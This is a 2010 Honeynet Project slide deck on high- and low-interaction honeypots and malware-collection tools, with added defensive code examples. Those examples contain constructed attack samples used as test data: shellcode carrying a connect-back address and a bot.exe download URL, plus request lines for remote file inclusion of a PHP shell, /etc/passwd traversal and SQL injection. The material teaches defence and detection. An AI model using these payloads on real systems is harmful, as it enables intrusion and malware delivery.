
Page 1: Use Honeypots to KYE

Use Honeypots to Know Your Enemies

Adel Karimi, The Honeynet Project

Nov 14, 2010

Page 2: Use Honeypots to KYE

Speaker

Adel Karimi

Member of The Honeynet Project (Iranian Chapter Lead)

Editor-in-chief of Snoop Security Ezine

M.S. Student @ Tehran Polytechnic

Page 3: Use Honeypots to KYE

Agenda

• About The Honeynet Project

• Introduction to Honeypot

• High-Interaction Honeypots

• Low-Interaction Honeypots

• Client Honeypots

Page 4: Use Honeypots to KYE

The Honeynet Project

• Founded in 1999, The Honeynet Project is an international, non-profit research organization dedicated to improving the security of the Internet at no cost to the public.

• We accomplish this goal in the following three ways:

– Awareness: we raise awareness of the threats and vulnerabilities that exist in the Internet today.

– Information: for those who are already aware and concerned, we provide details to better secure and defend your resources.

– Tools

Page 5: Use Honeypots to KYE

~ 40 International Chapters

Page 6: Use Honeypots to KYE

Iranian Honeynet Chapter

Page 7: Use Honeypots to KYE

Honeynet Project Challenges

• Learn about threats, analyze attacks, and share findings.

//honeynet.org/challenges

• Past Challenges:

– Challenge 6 - Analyzing Malicious Portable Destructive Files

– Challenge 5 - Log Mysteries

– Challenge 4 - VoIP

– Challenge 3 - Banking Troubles

– Challenge 2 - Browsers Under Attack

– Challenge 1 - pcap Attack Trace

Page 8: Use Honeypots to KYE

Honeypots

• Definition: "A honeypot is a security resource whose value lies in being probed, attacked, or compromised." - Lance Spitzner

• A honeypot has no production value, so anything going to or from it is likely a probe, an attack or a compromise; there is no legitimate traffic to filter out first.

Page 9: Use Honeypots to KYE

Honeypots

• Uses of honeypots:

– Slowing down and following incoming attackers

– Catching and analyzing 0-days, malware, botnets, and so on

– Improving intrusion detection systems

• SurfIDS

• Nebula (an intrusion signature generator)

"To learn the tools, tactics and motives involved in computer and network attacks."

Page 10: Use Honeypots to KYE

SurfIDS

Features:

• Distributed sensors

• Central honeypot deployment

• Central logging

Page 11: Use Honeypots to KYE

Honeypots

• Honeypot vs. IDS: an IDS has to pick attacks out of production traffic and lives with false positives; a honeypot has no legitimate users, so every connection it sees is worth looking at, though it only sees the attacks aimed at itself.

• Honeynet:

– A network of [High-Interaction] honeypots

– Main requirements:

• Data Control

• Data Capture

• Data Analysis

• Data Collection

Page 12: Use Honeypots to KYE

Types of Honeypots

• Production vs. Research honeypots:

– Production honeypots protect an organization, while research honeypots are used to learn.

• Different Types:

– High-Interaction

• Real environment

– Low-Interaction

• Simulated resource(s)

• Physical vs. Virtual !?

Page 13: Use Honeypots to KYE

High-Interaction Honeypots

• Honeywall: for capturing, controlling and analyzing attacks

– It creates an architecture that allows you to deploy both LI and HI honeypots, but is designed primarily for HI.

– Layer 2 bridging device (based on CentOS 5): it sits inline in front of the honeypots and is transparent at the IP layer, so the attacker has nothing to notice.

– Tools:

• IPtables

• Snort_inline

• Snort

• Hflow

• P0f

• Argus

• Sebek

• Walleye
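The Data Control and Data Capture requirements listed for a honeynet, worked through on constructed flow records, as an added example (this is not Honeywall's code; Honeywall enforces the outbound limit with iptables and captures with the tools above). The honeypot addresses, the per-hour limits and the record format are assumptions made for the example.

```python
"""Honeynet data control and data capture, over constructed flow records.

Added example: this is not Honeywall's code. Honeywall enforces outbound
connection limits with iptables and logs everything crossing its bridge; the
same policy is written out here in Python so the logic is visible in one place.
"""
from collections import Counter, defaultdict
from datetime import datetime

HONEYPOTS = {"10.0.0.51", "10.0.0.52"}                # assumed honeypot addresses
OUTBOUND_LIMIT = {"tcp": 20, "udp": 20, "icmp": 50}   # assumed per-honeypot, per-hour limits

# Constructed netflow-style records: "<time> <proto> <src>:<sport> -> <dst>:<dport>"
SAMPLE_FLOWS = [
    "2010-11-14T10:01:05 tcp 198.51.100.7:51234 -> 10.0.0.51:445",   # inbound exploit attempt
    "2010-11-14T10:01:09 tcp 10.0.0.51:1031 -> 198.51.100.7:6667",   # compromised host joins IRC
    "2010-11-14T10:02:00 tcp 10.0.0.51:1032 -> 203.0.113.9:80",      # pulls a second stage
    "2010-11-14T10:05:00 udp 192.0.2.3:3000 -> 10.0.0.52:137",       # inbound probe
]
# ... then the bot starts scanning for new victims: 25 outbound SMB connections
SAMPLE_FLOWS += [f"2010-11-14T10:{10 + i:02d}:00 tcp 10.0.0.51:{2000 + i} -> 203.0.113.{i + 1}:445"
                 for i in range(25)]


def parse_flow(line):
    ts, proto, src, _, dst = line.split()
    src_ip, sport = src.rsplit(":", 1)
    dst_ip, dport = dst.rsplit(":", 1)
    return {"time": datetime.fromisoformat(ts), "proto": proto,
            "src": src_ip, "sport": int(sport), "dst": dst_ip, "dport": int(dport)}


def apply_policy(lines, honeypots=HONEYPOTS, limits=OUTBOUND_LIMIT):
    """Data capture: log every flow touching a honeypot. Data control: let attackers
    in freely, but cap what a compromised honeypot may initiate towards the Internet."""
    outbound = defaultdict(int)   # (honeypot, proto, hour) -> connections seen
    log = []
    for line in lines:
        f = parse_flow(line)
        if f["dst"] in honeypots:
            direction, verdict = "inbound", "allow"   # no production value: every hit is interesting
        elif f["src"] in honeypots:
            direction = "outbound"
            key = (f["src"], f["proto"], f["time"].strftime("%Y-%m-%dT%H"))
            outbound[key] += 1
            verdict = "allow" if outbound[key] <= limits.get(f["proto"], 0) else "drop"
        else:
            direction, verdict = "transit", "ignore"  # not honeynet traffic; should not be on the bridge
        log.append({**f, "direction": direction, "verdict": verdict})
    return log


def summarize(log):
    """Counts per (direction, verdict), the numbers an analyst looks at first."""
    return dict(Counter((e["direction"], e["verdict"]) for e in log))


if __name__ == "__main__":
    for entry in apply_policy(SAMPLE_FLOWS):
        if entry["verdict"] != "ignore":
            print(f'{entry["time"]:%H:%M:%S} {entry["direction"]:8} {entry["verdict"]:5} '
                  f'{entry["proto"]} {entry["src"]}:{entry["sport"]} -> {entry["dst"]}:{entry["dport"]}')
    print(summarize(apply_policy(SAMPLE_FLOWS)))
```

The point of the limit is the trade-off the Honeywall makes: the attacker must be allowed enough outbound traffic to download tools and talk to a C&C (otherwise nothing is learned), but not enough to scan or attack third parties from your honeypot.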

Page 14: Use Honeypots to KYE

Honeywall

Walleye web interface

Page 15: Use Honeypots to KYE

High-Interaction Honeypots

• SEBEK

– For "data capture"

– Hidden kernel module on the honeypot that captures the attacker's activity (keystrokes, data read from files) and exports it covertly, so it keeps working even when the attacker's session is encrypted

Page 16: Use Honeypots to KYE

High-Interaction Honeypots

• Qebek (QEMU Sebek)

– A QEMU-based HI honeypot monitoring tool which aims at improving the invisibility of monitoring the attackers' activities in HI honeypots.

– Two techniques: virtual machine introspection (VMI) and system view reconstruction (SVR).

– VMI enables the IDS or other security system to monitor system events from outside the virtual machine, while SVR allows the monitoring system to reconstruct meaningful high-level OS information from the raw hardware-level information generated by VMI.

• Read the recently published KYT paper, "Qebek - Conceal the Monitoring". The paper is available from http://honeynet.org/papers/KYT_qebek

Page 17: Use Honeypots to KYE

Low-Interaction Honeypots

• Honeyd

– Written by Niels Provos in 2002.

– Available at www.honeyd.org

Features:

• Simulates thousands of virtual hosts at the same time

• Configuration of arbitrary services via a simple configuration file

• Simulates operating systems at the TCP/IP stack level (personalities taken from Nmap's fingerprint database), so a scanner fingerprints the virtual host as the OS you chose

• Tarpit (accept connections but keep them open and slow, to tie up scanners and worms)

• Dynamic templates

• Subsystem virtualization:

– Run real UNIX applications under virtual Honeyd IP addresses
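A configuration file putting the features above together, added here as an illustration rather than taken from the Honeyd distribution: two virtual hosts with different stack personalities, a scripted service, a tarpit port and a subsystem. The addresses, the script path and the subsystem command are assumptions; check the personality strings against the nmap.prints file and the port syntax against the honeyd man page of the version you run.

```conf
# honeyd.conf, constructed example (addresses, script and daemon paths are assumptions)

# Traffic to addresses with no template is dropped silently
create default
set default default tcp action block
set default default udp action block
set default default icmp action block

# A Windows host: stack fingerprint from Nmap's database, a few open ports,
# port 80 handed to an emulation script
create windows
set windows personality "Microsoft Windows XP Professional SP1"
set windows default tcp action reset
set windows default udp action reset
set windows uptime 1728650
add windows tcp port 80 "sh scripts/web.sh"
add windows tcp port 135 open
add windows tcp port 139 open
add windows tcp port 445 open

# A Linux host: port 22 is a tarpit (the connection is accepted but crawls),
# and a real daemon runs as a subsystem under the virtual address
create linux
set linux personality "Linux 2.4.20"
set linux default tcp action reset
add linux tcp port 22 tarpit open
add linux subsystem "/usr/sbin/httpd"

# Bind the templates to the virtual hosts
bind 10.0.0.51 windows
bind 10.0.0.52 linux
```

The "default" template matters: without it, probes to unbound addresses in the range honeyd claims would be answered inconsistently and give the deception away.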

Page 18: Use Honeypots to KYE

Low-Interaction Honeypots

• Nepenthes

– "Nepenthes is a versatile tool to collect malware. It acts passively by emulating known vulnerabilities and downloading malware trying to exploit these vulnerabilities." (Excerpt from the Nepenthes website)

– Nepenthes is outdated

• Do not use Nepenthes, use Dionaea instead.

• Read why: http://carnivore.it/2009/10/27/introducting_dionaea

Page 19: Use Honeypots to KYE

• PHARM is a client/server tool to manage, report on and analyze all your distributed Nepenthes instances from one interface.

Page 20: Use Honeypots to KYE

Low-Interaction Honeypots

• Mwcollect

– mwcollectd is a versatile malware collection daemon, uniting the best features of nepenthes and honeytrap.

Page 21: Use Honeypots to KYE

Low-Interaction Honeypots

• Dionaea

– Nepenthes successor

– Dionaea's intention is to trap malware exploiting vulnerabilities exposed by services offered to a network.

• Features:

– Static state machines to emulate vulnerable services

– Pattern matching to extract values from shellcode

– Download copies of the attacking worm

– Store on disk, or submit to a sandbox

Page 22: Use Honeypots to KYE

Dionaea

• Features:

– Implements the required parts of the SMB protocol

– Uses libemu (beyond pattern matching: the shellcode is emulated to find out what it does, so an encoder the patterns have never seen does not defeat it)

– Fewer services, better emulation and better logging..
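The two extraction steps Nepenthes and Dionaea rely on, pattern matching over the captured payload and decoding of a hidden payload, as an added example written for this page (it is not code from either project, and the single-byte XOR decoder is a much simplified stand-in for nepenthes' shellcode handlers and libemu). The payloads, the push-sequence pattern and the addresses are constructed for the example.

```python
"""Extracting what an exploit payload would do, Nepenthes/Dionaea style.

Added example, not code from either project. Two steps from the slides:
pattern matching over the captured payload for the values the shellcode
carries (download URL, connect-back address), and a small single-byte XOR
decoder for payloads that hide those strings, a much-simplified stand-in for
nepenthes' shellcode handlers and libemu. All payloads are constructed.
"""
import hashlib
import re
import struct

# Download URL carried in clear text (ends at the first non-printable byte)
URL_RE = re.compile(rb"(?:https?|ftp|tftp)://[\x21-\x7e]+")
# Constructed pattern for a sockaddr_in built on the stack:
#   68 <ip, 4 bytes>  push imm32        66 68 <port, 2 bytes>  push imm16
SOCKADDR_RE = re.compile(rb"\x68(.{4})\x66\x68(.{2})", re.DOTALL)


def extract_plain(payload):
    """Pull URLs and (ip, port) pairs out of an unencoded payload."""
    urls = [m.decode("ascii", "replace") for m in URL_RE.findall(payload)]
    peers = []
    for ip_raw, port_raw in SOCKADDR_RE.findall(payload):
        ip = ".".join(str(b) for b in ip_raw)
        port = struct.unpack(">H", port_raw)[0]   # pushed in network byte order
        peers.append((ip, port))
    return urls, peers


def xor_decode_candidates(payload):
    """Brute-force the 255 single-byte XOR keys; yield decodings that expose a URL."""
    for key in range(1, 256):
        decoded = bytes(b ^ key for b in payload)
        if URL_RE.search(decoded):
            yield key, decoded


def analyze(payload):
    """What the honeypot records for one captured payload."""
    urls, peers = extract_plain(payload)
    xor_key = None
    if not urls:
        for key, decoded in xor_decode_candidates(payload):
            urls, peers = extract_plain(decoded)
            xor_key = key
            break
    return {"sha256": hashlib.sha256(payload).hexdigest(),   # name to store the sample under
            "urls": urls, "peers": peers, "xor_key": xor_key}


# Constructed payload 1: NOP sled, a connect-back sockaddr (198.51.100.7:6667), a clear-text URL
SAMPLE_PLAIN = (b"\x90" * 8
                + b"\x68\xc6\x33\x64\x07"      # push 198.51.100.7
                + b"\x66\x68\x1a\x0b"          # push word 6667
                + b"\x66\x6a\x02"              # push word AF_INET
                + b"http://198.51.100.7/bot.exe\x00")
# Constructed payload 2: the same kind of URL, XOR-encoded with key 0x5a, as an encoder would emit
SAMPLE_XOR = bytes(b ^ 0x5a for b in b"\xe8\x00\x00\x00\x00tftp://203.0.113.9/x.exe\x00")

if __name__ == "__main__":
    for sample in (SAMPLE_PLAIN, SAMPLE_XOR):
        print(analyze(sample))
```

The plain pattern works only for shellcode that matches a signature someone has already written; the decoder loop is the first step away from that, and libemu goes the whole way by executing the bytes. The sha256 in the result is the file name to store the sample under, so the same worm arriving a thousand times is stored once.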

Page 23: Use Honeypots to KYE

Low-Interaction Honeypots

• Amun – A Python Honeypot

– Basically a nepenthes port to python

Page 24: Use Honeypots to KYE

Amun

• A sample of collected attack data from Amun:

Page 25: Use Honeypots to KYE

Amun

DEMO: Using Metasploit to launch an attack against Amun (MS08-067)

Source: http://amunhoney.sourceforge.net

Page 26: Use Honeypots to KYE

Low-Interaction Honeypots

• A new approach..

• Glastopf

– A dynamic, LI web-app honeypot

– A minimalistic web server written in Python

– Collects information about web application-based attacks like RFI, SQL injection, and LFI

– Glastopf scans the incoming request for strings like "=http://" or "=ftp://", tries to download and analyze the referenced file, and responds as close as possible to the attacker's expectations, so the attacker's script carries on and reveals its next step

– The attacker sends us, for example, a bot, shell or spreader
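A request classifier in the spirit of the Glastopf description above, added here as an illustration (not Glastopf's code): it labels each constructed request as RFI, LFI, SQL injection or benign and picks the response the attacker's tooling expects. The request lines, the parameter names, the token lists and the fake /etc/passwd are constructed.

```python
"""Glastopf-style request triage for a low-interaction web honeypot.

Added example, not Glastopf's code. The honeypot cannot execute the attacker's
PHP, so it inspects the request, labels the attack class, and picks a response
that keeps the attacker's script on its happy path. Requests are constructed.
"""
from urllib.parse import parse_qsl, urlsplit

# Constructed request lines, the kind a web honeypot on a public IP sees within hours
SAMPLE_REQUESTS = [
    "GET /index.php?page=http://203.0.113.9/r57.txt?? HTTP/1.1",        # RFI, trailing ?? neutralises an appended ".php"
    "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1",          # LFI with a null byte to cut off the extension
    "GET /news.php?id=1%27%20UNION%20SELECT%201,2,3--%20 HTTP/1.1",    # SQL injection probe
    "GET /robots.txt HTTP/1.1",                                         # nothing suspicious
]
# Constructed content: what an LFI for /etc/passwd is expected to reveal
FAKE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/bin/sh\n"

RFI_SCHEMES = ("http://", "https://", "ftp://")
SQLI_TOKENS = ("union select", "' or ", "\" or ", "sleep(", "benchmark(", "information_schema")


def classify_request(line):
    """Label one request line; parse_qsl already percent-decodes the values."""
    _method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        low = value.lower()
        if low.startswith(RFI_SCHEMES):
            return {"kind": "rfi", "path": parts.path, "param": name, "url": value.rstrip("?")}
        if "../" in value or "\x00" in value or "/etc/passwd" in low:
            return {"kind": "lfi", "path": parts.path, "param": name, "file": value.rstrip("\x00")}
        if any(token in low for token in SQLI_TOKENS):
            return {"kind": "sqli", "path": parts.path, "param": name, "payload": value}
    return {"kind": "benign", "path": parts.path}


def craft_response(finding):
    """Return (status, body, next_action): the reply to send and what the honeypot does with the finding."""
    kind = finding["kind"]
    if kind == "rfi":
        # Glastopf fetches the injected file (usually a PHP shell) for analysis and answers as if it ran
        return 200, "<html><body>OK</body></html>", f"download {finding['url']}"
    if kind == "lfi":
        body = FAKE_PASSWD if finding["file"].endswith("/etc/passwd") else ""
        return 200, body, "log"
    if kind == "sqli":
        # most injection scanners decide "vulnerable" on seeing a database error string
        return 200, "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version", "log"
    return 404, "Not Found", "ignore"


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        finding = classify_request(line)
        status, _body, action = craft_response(finding)
        print(f"{finding['kind']:6} {status} {action:40} {line}")
```

Note what the RFI branch does not do: it never executes the downloaded file. The value of the honeypot is the file itself (the shell, bot or spreader the slide mentions) plus the URL it came from, which is usually a compromised third-party host worth reporting.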

Page 27: Use Honeypots to KYE

Client Honeypots

• What is a HoneyClient!? A client honeypot turns the model around: instead of waiting to be attacked, it actively visits servers (web sites, for example) as a client and watches whether the client gets exploited.

• Drive-by Download Attacks

Source: http://www.honeynet.org/papers/mw

Source: Canadian Honeynet Project

Page 28: Use Honeypots to KYE

Other Types of Honeypots

• WiFi Honeypot

• VoIP Honeypot

– VoIP Honey

– Artemisa

• SSH Honeypot

– Kippo

– Kojoney

• …

Page 29: Use Honeypots to KYE

Conclusion

• You can use Honeypots to know your enemies..!

– Collecting malware

– Tracking botnets

– …

Further reading: Virtual Honeypots: From Botnet Tracking to Intrusion Detection, by Niels Provos and Thorsten Holz

Page 30: Use Honeypots to KYE

Use Honeypots to Know Your Enemies

By Adel Karimi Iranian Honeynet Chapter adel.net at Gmail.com

Thank You..

?